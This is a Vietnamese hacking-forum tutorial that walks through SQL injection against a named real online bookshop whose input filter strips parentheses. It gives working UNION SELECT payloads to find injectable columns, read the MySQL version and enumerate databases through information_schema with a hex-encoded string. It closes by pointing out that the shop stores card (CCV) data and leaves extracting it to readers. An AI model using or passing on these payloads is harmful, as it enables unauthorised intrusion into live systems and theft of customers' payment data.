[TUT] - Shop chặn ()

Link: http://www.changelingpress.com/product.php?&upt=book&ubid=1358 Thực ra con shop này ko khó hack đâu . Cái mà chúng ta cần biết là làm sao nó éo chặn đc Như Fu thấy nó chặn ( ăn mất 2 ký tự () ) Nên Fu nghĩ hướng khác khai thác thôi . Đầu tiên tư duy 1 tý . Nó chặn vậy . Ko thể khai thác tên Database hiện tại shop đang dùng => ko khai thác đc các bảng => ko khai thác đc các cột của bảng mà mình muốn => ko lấy đc data mình muốn Vậy thì Fu cứ chơi simple thôi . ko dùng câu lệnh nào có 2 ký tự () Fu nghĩ . trong Mysql mặc định có 1 database mặc định là infortmation_Schema . Còn lại là các databases khác . Vậy Fu sẽ Query ( Phủ định ) Fu select tên cơ sở dữ liệu ( loại cái information_Schema ) kia ra Đối với con shop này . Chỉ cần biết được database() hiện tại mà nó sử dụng là sẽ khai thác được hết mọi thứ nên Fu chỉ nói hướng khai thác thôi nha . Còn lại anh em tự làm tiếp . Giờ xỉn quá rồi Fu order by đc 20 . Vậy Sẽ thế này Quote: http://www.changelingpress.com/produ...ook&ubid=-1358 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- FutokoVNW Thấy rõ ràng nhất 2 vị trí lỗi là 2 và 3 Giờ khai thác mấy cái basic ( chỉ cần version thôi Nếu 4.x thì xin lỗi em yêu a té Còn 5.x thì a hiếp tiếp ) Quote: http://www.changelingpress.com/produ...ook&ubid=-1358 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20 -- FutokoVNW Ta được : Quote: 5.0.45-log Rồi OKe . Giờ khai thác luôn cái quần Chip em này đang mặc nó là hiệu gì . Fu dùng phủ định như đã nói ở trên : Quote: http://www.changelingpress.com/produ...ook&ubid=-1358 UNION SELECT 1,table_Schema,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20 From Information_SChema.Tables where Table_SChema != 0x696e666f726d6172696f6e5f534368656d61 -- FutokoVNW Ta được : Quote: changelingpress Chỗ này : Table_SChema != 0x696e666f726d6172696f6e5f534368656d61 tương đương với Table_SChema != 'information_Schema' nhé anh em ( MAgic QUOTE ON mà nên phải hex ra ) Sài thêm limit x,y để coi sao thì Fu thấy nó có mỗi cái DB này thôi ( loại cái information_SChema ra rồi ) Đến đây sẽ khai thác được hết những gì mình cần ( Quay gãy mẹ tay luôn ) Fu order thử thấy shop này có CCV đó . Còn khai thác như nào anh em tự làm nốt nhé End Tut!